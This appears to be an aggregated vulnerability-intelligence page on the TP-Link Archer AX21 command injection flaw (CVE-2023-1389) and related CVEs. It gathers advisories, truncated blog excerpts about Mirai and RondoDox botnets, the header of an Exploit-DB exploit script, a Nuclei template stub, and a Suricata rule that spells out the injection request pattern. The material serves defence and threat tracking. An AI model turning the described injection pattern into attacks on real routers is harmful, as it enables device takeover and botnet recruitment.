A directory traversal vulnerability exists in the administrator console in Adobe ColdFusion which allows remote attackers to read arbitrary files.
Affected: Adobe ColdFusion
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/; https://cybersecurityworks.com/howdymanage/uploads/file/csw_final_ransomware_index-update-q321-csw_.pdf; https://cybersecurityworks.com/howdymanage/uploads/file/ransomware-_-2022-spotlight-report_compressed.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.greynoise.io/blog/battling-ransomware-one-
VulnCheck
Adobe ColdFusion Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2009·CVSS 4.3
CVE-2009-1872 [MEDIUM] Adobe ColdFusion Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Adobe ColdFusion Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
Affected: Adobe ColdFusion
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f
VulnCheck
Adobe BlazeDS Information Disclosure Vulnerability
vulncheck·2009·CVSS 6.5
CVE-2009-3960 [MEDIUM] Adobe BlazeDS Information Disclosure Vulnerability
Adobe BlazeDS Information Disclosure Vulnerability
Adobe BlazeDS, which is utilized in LifeCycle and Coldfusion, contains a vulnerability that allows for information disclosure.
Affected: Adobe BlazeDS
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/; https://cybersecurityworks.com/howdymanage/uploads/file/csw_final_ransomware_index-update-q321-csw_.pdf; https://cybersecurityworks.com/howdymanage/uploads/file/ransomware-_-2022-spotlight-report_compressed.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://cybersecurityworks.com/howdymanage/uploads/file/RansomwareUpdate%20Re
VulnCheck
dirk_bartley nweb2fax Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2008·CVSS 5.0
CVE-2008-6668 [MEDIUM] dirk_bartley nweb2fax Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
dirk_bartley nweb2fax Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) id parameter to comm.php and (2) var_filename parameter to viewrq.php.
Affected: dirk_bartley nweb2fax
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-20
VulnCheck
Alcatel OmniPCX Enterprise Remote Code Execution Vulnerability
vulncheck·2007·CVSS 9.8
CVE-2007-3010 [CRITICAL] CWE-20 Alcatel OmniPCX Enterprise Remote Code Execution Vulnerability
Alcatel OmniPCX Enterprise Remote Code Execution Vulnerability
masterCGI in the Unified Maintenance Tool in Alcatel OmniPCX Enterprise Communication Server allows remote attackers to execute arbitrary commands.
Affected: Alcatel OmniPCX Enterprise
Required Action: Apply updates per vendor instructions.
Exploitation References: https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/; https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://cujo.com/blog/the-2022-2023-iot-botnet-report-vulnerabilities-targeted/; https://cujo.com/the-2022-2023-iot-botnet-report-vulnerabilities-targeted/; https://www.trustwave.com
CISA
TP-Link Archer AX-21 Command Injection Vulnerability
cisa·2023-05-01·CVSS 8.8
CVE-2023-1389 [HIGH] CWE-77 TP-Link Archer AX-21 Command Injection Vulnerability
Vulnerability: TP-Link Archer AX-21 Command Injection Vulnerability
Affected: TP-Link Archer AX21
TP-Link Archer AX-21 contains a command injection vulnerability that allows for remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://www.tp-link.com/us/support/download/archer-ax21/v3/#Firmware; https://nvd.nist.gov/vuln/detail/CVE-2023-1389
Remediation Due Date: 2023-05-22
Suricata
ET EXPLOIT TP-Link Archer AX21 Unauthenticated Command Injection Inbound (CVE-2023-1389)
suricata·2023-03-14·CVSS 8.8
CVE-2023-1389 [HIGH] ET EXPLOIT TP-Link Archer AX21 Unauthenticated Command Injection Inbound (CVE-2023-1389)
ET EXPLOIT TP-Link Archer AX21 Unauthenticated Command Injection Inbound (CVE-2023-1389)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT TP-Link Archer AX21 Unauthenticated Command Injection Inbound (CVE-2023-1389)"; http.method; content:"POST"; http.uri; content:"/cgi-bin"; startswith; content:"|3b|stok=/locale?form=country"; fast_pattern; http.request_body; content:"operation=write"; content:"country=|24 28|"; reference:cve,2023-1389; reference:url,tenable.com/security/research/tra-2023-11; classtype:attempted-admin; sid:2044585; rev:1; metadata:attack_target Networking_Equipment, created_at 2023_03_14, cve CVE_2023_1389, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_KEV, updated_at 2023_03_14, mitre_tactic_id T
Exploit-DB
TP-Link Archer AX21 - Unauthenticated Command Injection
exploitdb·2023-08-10·CVSS 8.8
CVE-2023-1389 [HIGH] TP-Link Archer AX21 - Unauthenticated Command Injection
TP-Link Archer AX21 - Unauthenticated Command Injection
---
#!/usr/bin/python3
#
# Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection
# Date: 07/25/2023
# Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)
# Vendor Homepage: https://www.tp-link.com/us/
# Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)
# Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0
# CVE: CVE-2023-1389
#
# Disclaimer: This script is intended to be used for educational purposes only.
# Do not run this against any system that you do not have permission to test.
# The author will not be held responsible for any use or damage caused by this
# program.
#
# CVE-202
Nuclei
TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
nuclei·CVSS 8.8
CVE-2023-1389 [HIGH] TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.
Template:
id: CVE-2023-1389
info:
name: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
author: ritikchaddha
severity: critical
description: |
TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.
impact: |
Unauthenticated attackers can exploit OS command injection through the country parameter in the locale endpoint to execute arbitrary commands
Checkpoint
4th May – Threat Intelligence Report
blogs_checkpoint·2026-05-04·CVSS 9.9
CVE-2026-26268 [CRITICAL] 4th May – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 4th May – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 4th May, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Medtronic, a global medical device maker, has disclosed a cyberattack on its corporate IT systems. An unauthorized party accessed data, while the company reported no impact on products, operations, or financial systems. Threat group ShinyHunters claimed the theft of 9 million records, and Medtronic is evaluating what data was expose
Krebs
Anti-DDoS Firm Heaped Attacks on Brazilian ISPs
blogs_krebs·2026-04-30
CVE-2023-1389 Anti-DDoS Firm Heaped Attacks on Brazilian ISPs
A Brazilian tech firm that specializes in protecting networks from distributed denial-of-service (DDoS) attacks has been enabling a botnet responsible for an extended campaign of massive DDoS attacks against other network operators in Brazil, KrebsOnSecurity has learned. The firm’s chief executive says the malicious activity resulted from a security breach and was likely the work of a competitor trying to tarnish his company’s public image.
An Archer AX21 router from TP-Link. Image: tp-link.com.
For the past several years, security experts have tracked a series of massive DDoS attacks originating from Brazil and solely targeting Brazilian ISPs. Until recently, it was less than clear who or what was behind these digital sieges. That changed earlier this month when a trusted source who ask
Bleepingcomputer
New Mirai campaign exploits RCE flaw in EoL D-Link routers
blogs_bleepingcomputer·2026-04-22·CVSS 8.8
CVE-2025-29635 [HIGH] New Mirai campaign exploits RCE flaw in EoL D-Link routers
## New Mirai campaign exploits RCE flaw in EoL D-Link routers
## Bill Toulas
"The Akamai SIRT discovered active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 in our global network of honeypots in early March 2026," reads Akamai's report .
"This vulnerability exists in D-Link DIR-823X series routers in firmware versions 240126 and 24082, and allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to the /goform/set_prohibiting endpoint via the corresponding function, which can trigger remote command execution."
The researchers who discovered the flaw briefly published a proof-of-concept (PoC) exploit on GitHub, but later retracted it.
Akamai's observations show attackers are sending POST requests that
Greynoiseio
Threat Actors Actively Targeting LLMs
blogs_greynoiseio·2026-01-08
Threat Actors Actively Targeting LLMs
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Checkpoint
13th October – Threat Intelligence Report
blogs_checkpoint·2025-10-13
CVE-2023-1389 13th October – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 13th October – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 13th October, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
Qilin ransomware group has claimed responsibility for targeting Asahi, Japan’s largest brewing company, that had been hacked on September 29 th . The attack resulted in the exfiltration of over 9,300 files totaling 27GB of sensitive data, including financial documents, employee IDs, contracts, and internal reports. The at
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022 .
Januar
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
The Trend Zero Day Initiative™ (ZDI) and Trend™ Research teams have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Ow
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
# RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus
2025/10/09
Read time: ( words)
Save to Folio
Key takeaways
- The campaign exposes organizations to the risks of data exfiltration, persistent network compromise, and operational disruption for organizations with exposed infrastructure.
- Organizations operating internet-facing network devices are at heightened risk. Active exploitation has been observed globally since mid-2025, with several CVEs now included in CISA’s Known Exploited Vul
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus 2025/10/09 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022 .
January
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Ciberamenazas
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
The Trend Zero Day Initiative™ (ZDI) and Trend™ Research teams have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Ow
Bleepingcomputer
RondoDox botnet targets 56 n-day flaws in worldwide attacks
blogs_bleepingcomputer·2025-10-09·CVSS 8.8
[HIGH] RondoDox botnet targets 56 n-day flaws in worldwide attacks
## RondoDox botnet targets 56 n-day flaws in worldwide attacks
## Bill Toulas
A new large-scale botnet called RondoDox is targeting 56 vulnerabilities in more than 30 distinct devices, including flaws first disclosed during Pwn2Own hacking competitions.
The attacker focuses on a wide range of exposed devices, including DVRs, NVRs, CCTV systems, and web servers and have been active since June.
The RondoDox botnet leverages what Trend Micro researchers call an “exploit shotgun” strategy, where numerous exploits are used simultaneously to maximize the infections, even if the activity is very noisy.
Since FortiGuard Labs discovered RondoDox , the botnet appears to have expanded the list of exploited vulnerabilities, which included CVE-2024-3721 and CVE-2024-12856.
## Mass n-day exploitat
Fortinet
The Resurgence of IoT Malware: Inside the Mirai-Based Botnet Campaign | FortiGuard Labs
blogs_fortinet·2025-08-22
The Resurgence of IoT Malware: Inside the Mirai-Based Botnet Campaign | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
The Resurgence of IoT Malware: Inside the Mirai-Based Botnet Campaign
Unpacking the Mirai-based Gayfemboy botnet campaign, its evolution, global targets, and Fortinet security protections
FORTIGUARD SECURITY PORTFOLIO 2025 THREAT LANDSCAPE REPORT
Incidents
Malware Analysis
Conclusion
Fortinet Protections
IOCs
By Vincent Li | August 22, 2025
Affected Platforms: DrayTek Vigor2960 1.3.1_Beta, DrayTek Vigor3900 1.4.4_Beta, DrayTek Vigor300B 1.3.3_Beta, DrayTek Vigor300B 1.4.2.1_Beta, DrayTek Vigor300B 1.4.4_Beta, TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219, Raisecom MSG1200, Raisecom MSG2100E, Raisecom MSG2200, Raisecom MSG2300 3.90, Cisco ISE, Cisco ISE-PIC
Impacted Users: Any organization
Impact: Remote attackers gain control
Fortinet
RondoDox Unveiled: Breaking Down a New Botnet Threat | FortiGuard Labs
blogs_fortinet·2025-07-03·CVSS 7.2
[HIGH] RondoDox Unveiled: Breaking Down a New Botnet Threat | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
RondoDox Unveiled: Breaking Down a New Botnet Threat
A new botnet built for evasion and disruption
Vulnerability Details
Downloader Analysis
RondoDox Analysis
Conclusion
Fortinet Protections
IOCs
By Vincent Li | July 03, 2025
Affected Platforms: TBK DVR-4104. TBK DVR-4216. Four-Faith router models F3x24. Four-Faith router models F3x36.
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
Over the past month, FortiGuard Labs has observed a significant increase in scanning activity, including a new botnet campaign that exploits two high-risk vulnerabilities: CVE-2024-3721 and CVE-2024-12856. Both have been publicly disclosed and are actively being targeted, posing serious risks to device se
Bleepingcomputer
Hackers target SSRF bugs in EC2-hosted sites to steal AWS credentials
blogs_bleepingcomputer·2025-04-09
Hackers target SSRF bugs in EC2-hosted sites to steal AWS credentials
## Hackers target SSRF bugs in EC2-hosted sites to steal AWS credentials
## Bill Toulas
A targeted campaign exploited Server-Side Request Forgery (SSRF) vulnerabilities in websites hosted on AWS EC2 instances to extract EC2 Metadata, which could include Identity and Access Management (IAM) credentials from the IMDSv1 endpoint.
Retrieving IAM credentials allows attackers to escalate their privileges and access S3 buckets or control other AWS services, potentially leading to sensitive data exposure, manipulation, and service disruption.
The campaign was discovered by F5 Labs researchers , who reports that the malicious activity culminated between March 13 and 25, 2025. The traffic and behavioral patterns strongly suggest that it was carried out by a single threat actor.
## Campaign over
Schneier
TP-Link Router Botnet
blogs_schneier·2025-03-14·CVSS 8.8
CVE-2023-1389 [HIGH] TP-Link Router Botnet
## TP-Link Router Botnet
There is a new botnet that is infecting TP-Link routers:
The botnet can lead to command injection which then makes remote code execution (RCE) possible so that the malware can spread itself across the internet automatically. This high severity security flaw (tracked as CVE-2023-1389 ) has also been used to spread other malware families as far back as April 2023 when it was used in the Mirai botnet malware attacks. The flaw also linked to the Condi and AndroxGh0st malware attacks.
[…]
Of the thousands of infected devices, the majority of them are concentrated in Brazil, Poland, the United Kingdom, Bulgaria and Turkey; with the botnet targeting manufacturing, medical/healthcare, services and technology organizations in the United States, Australia, China and Mexi
Bleepingcomputer
New botnet exploits vulnerabilities in NVRs, TP-Link routers
blogs_bleepingcomputer·2024-12-24·CVSS 9.8
[CRITICAL] New botnet exploits vulnerabilities in NVRs, TP-Link routers
## New botnet exploits vulnerabilities in NVRs, TP-Link routers
## Bill Toulas
A new Mirai-based botnetis actively exploiting a remote code execution vulnerability that has not received a tracker number and appears to be unpatched in DigiEver DS-2105 Pro NVRs.
The campaign started in October and targets multiple network video recorders and TP-Link routers with outdated firmware.
One of the vulnerabilities used in the campaign was documented by TXOne researcher Ta-Lun Yen and presented last year at the DefCamp security conference in Bucharest, Romania. The researcher said at the time that the issue affects multiple DVR devices.
Akamai researchers observed that the botnet started to exploit the flaw in mid-November, but found evidence that the campaign has been active since at least Sep
Fortinet
MerkSpy: Exploiting CVE-2021-40444 to Infiltrate Systems | FortiGuard Labs
blogs_fortinet·2024-06-27·CVSS 8.8
CVE-2021-40444 [HIGH] MerkSpy: Exploiting CVE-2021-40444 to Infiltrate Systems | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
MerkSpy: Exploiting CVE-2021-40444 to Infiltrate Systems
CVE-2021-40444 Exploitation
ShellCode Preparation
ShellCode
MerkSpy
Conclusion
Fortinet Protections
IOCs
IP Addresses
Files
By Cara Lin | June 27, 2024
Affected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: The stolen information can be used for future attack
Severity Level: High
Spyware is malicious software engineered to covertly monitor and gather information from a user’s computer without their awareness or consent. It can record activities like keystrokes, browsing behavior, and personal information, often transmitting this data to a third party for espionage or theft.
FortiGuard Labs recently detected an attack exploiting the CVE-2021-40444 vulnerability in Microsoft
Fortinet
The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
blogs_fortinet·2024-06-25·CVSS 9.8
[CRITICAL] The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
The Growing Threat of Malware Concealed Behind Cloud Services
UNSTABLE Botnet
Condi DDoS Botnet
UDP Flooder and Process Checker
Skibidi
Conclusion
Fortinet Protections
IOCs
C2
URLs
Files
By Cara Lin and Vincent Li | June 25, 2024
Affected Platforms: Linux Distributions
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
Cybersecurity threats are increasingly leveraging cloud services to store, distribute, and establish command and control (C2) servers, such as VCRUMS stored on AWS or SYK Crypter distributed via DriveHQ. This shift in strategy presents significant challenges for detection and prevention, as cloud services provide scalability, anonymity, and resilience that traditional hostin
Bleepingcomputer
Multiple botnets exploiting one-year-old TP-Link flaw to hack routers
blogs_bleepingcomputer·2024-04-17·CVSS 8.8
CVE-2023-1389 [HIGH] Multiple botnets exploiting one-year-old TP-Link flaw to hack routers
## Multiple botnets exploiting one-year-old TP-Link flaw to hack routers
## Bill Toulas
At least six distinct botnet malware operations are hunting for TP-Link Archer AX21 (AX1800) routers vulnerable to a command injection security issue reported and addressed last year.
Tracked as CVE-2023-1389, the flaw is a high-severity unauthenticated command injection problem in the locale API reachable through the TP-Link Archer AX21 web management interface.
Several researchers discovered it in January 2023 and reported to the vendor through the Zero-Day Initiative (ZDI). TP-Link addressed the problem with the release of firmware security updates in March 2023. Proof-of-concept exploit code emerged shortly after the security advisories became public.
Following that, cybersecurity teams warned
Fortinet
Botnets Continue Exploiting CVE-2023-1389 for Wide-Scale Spread | FortiGuard Labs
blogs_fortinet·2024-04-16·CVSS 8.8
CVE-2023-1389 [HIGH] Botnets Continue Exploiting CVE-2023-1389 for Wide-Scale Spread | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Botnets Continue Exploiting CVE-2023-1389 for Wide-Scale Spread
Infection - CVE-2023-1389
AGoent
Gafgyt Variant
Moobot
Mirai Variant
Miori
Condi
Conclusion
Fortinet Protections
IOCs
C2
URLs
Files
By Cara Lin and Vincent Li | April 16, 2024
Affected Platforms: TP-Link Archer AX21 (AX1800) Version 1.1.4 Build 20230219 or prior
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
Last year, a command injection vulnerability, CVE-2023-1389, was disclosed and a fix developed for the web management interface of the TP-Link Archer AX21 (AX1800). FortiGuard Labs has developed an IPS signature to tackle this issue. Recently, we observed multiple attacks focusing on this year-old vulnerability, spotl
Fortinet
GoTitan Botnet - Ongoing Exploitation on Apache ActiveMQ | FortiGuard Labs
blogs_fortinet·2023-11-28·CVSS 10.0
[CRITICAL] GoTitan Botnet - Ongoing Exploitation on Apache ActiveMQ | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
GoTitan Botnet - Ongoing Exploitation on Apache ActiveMQ
Exploitation
GoTitan
Sliver
PrCtrl Rat
Kinsing
Ddostf
Conclusion
Fortinet Protections
IOCs
IP List
Files
By Cara Lin | November 28, 2023
Affected Platforms: Any OS running Apache Active MQ versions prior to 5.15.16, 5.16.7, 5.17.6, and 5.18.3
Impacted Parties: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
This past October, Apache issued a critical advisory addressing CVE-2023-46604, a vulnerability involving the deserialization of untrusted data in Apache. On November 2, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-46604 to its known exploited list, KEV Catalog, indicating this vulnerability's high risk and im
Bleepingcomputer
Mirai DDoS malware variant expands targets with 13 router exploits
blogs_bleepingcomputer·2023-10-10·CVSS 9.8
[CRITICAL] Mirai DDoS malware variant expands targets with 13 router exploits
## Mirai DDoS malware variant expands targets with 13 router exploits
## Bill Toulas
A Mirai-based DDoS (distributed denial of service) malware botnet tracked as IZ1H9 has added thirteen new payloads to target Linux-based routers and routers from D-Link, Zyxel, TP-Link, TOTOLINK, and others.
Fortinet researchers report observing a peak in the exploitation rates around the first week of September, reaching tens of thousands of exploitation attempts against vulnerable devices.
IZ1H9 compromises devices to enlist them to its DDoS swarm and then launches DDoS attacks on specified targets, presumably on the order of clients renting its firepower.
## Extensive IoT targeting
The more devices and vulnerabilities targeted by a DDoS malware increased the potential to build a large and powerful
Fortinet
IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits | FortiGuard Labs
blogs_fortinet·2023-10-09·CVSS 9.8
[CRITICAL] IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits
By Cara Lin | October 09, 2023
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
In September 2023, our FortiGuard Labs team observed that the IZ1H9 Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Thirteen payloads were included in this variant, including D-Link devices, Netis wireless router, Sunhillo SureLine, Geutebruck IP camera, Yealink Device Management, Zyxel devices, TP-Link Archer, Korenix Jetwave, and TOTOLINK routers.
Based on the trigger counts recorded by our IPS signatures, it is evident that peak exploitation occurred on September 6, with trigger counts ran
Fortinet
DDoS Botnets Target Zyxel Vulnerability CVE-2023-28771 | FortiGuard Labs
blogs_fortinet·2023-07-19·CVSS 9.8
CVE-2023-28771 [CRITICAL] DDoS Botnets Target Zyxel Vulnerability CVE-2023-28771 | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
DDoS Botnets Target Zyxel Vulnerability CVE-2023-28771
By Cara Lin | July 19, 2023
Affected platforms: Linux
Impacted parties: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity level: Critical
In June 2023, FortiGuard Labs detected the propagation of several DDoS botnets exploiting the Zyxel vulnerability (CVE-2023-28771). This vulnerability is characterized by a command injection flaw affecting multiple firewall models that could potentially allow an unauthorized attacker to execute arbitrary code by sending a specifically crafted packet to the targeted device. The severity of this flaw, rated 9.8 on the CVSS scoring system, was reported by researchers from TRAPA Security. Zyxel released a security advisory regard
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL] IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
## Executive Summary
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:
CVE/Product
Description
CVE-2019-12725
Zeroshell Remote Command Execution Vulnerability
CVE-2019-17621
D-Link DIR-859 Remote Command Injection Vulnerability
CVE-2019-20500
D-Link DWL-2600AP Remote Command Execution Vulnerability
CVE-2021-25296
Nagios XI Remote Command Injection Vulnerability
CVE-2021-46422
Telesquare SDT-CW3B1 Router Command Injection Vulnerability
CVE-2022-27002
Arris TR3300 Remote Command Injection Vulnerability
CVE-2022-29303
SolarView Compact Command Injection Vulnerability
CVE-2022-30023
Tenda HG9 Router Command Injectio
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL] IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Threat Research Center
Trend Reports
Vulnerabilities
## IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Chao Lei
Zhibin Zhang
Yiheng An
Cecilia Hu
Published: June 22, 2023
Trend Reports
Vulnerabilities
Botnet
CVE-2019-12725
CVE-2019-17621
CVE-2019-20500
CVE-2021-25296
CVE-2021-46422
CVE-2022-27002
CVE-2022-29303
CVE-2022-30023
CVE-2022-30525
CVE-2022-31499
CVE-2022-36266
CVE-2022-40005
CVE-2022-45699
CVE-2023-1389
CVE-2023-25280
CVE-2023-27240
IoT
IoT Security
Mirai
## Executive Summary
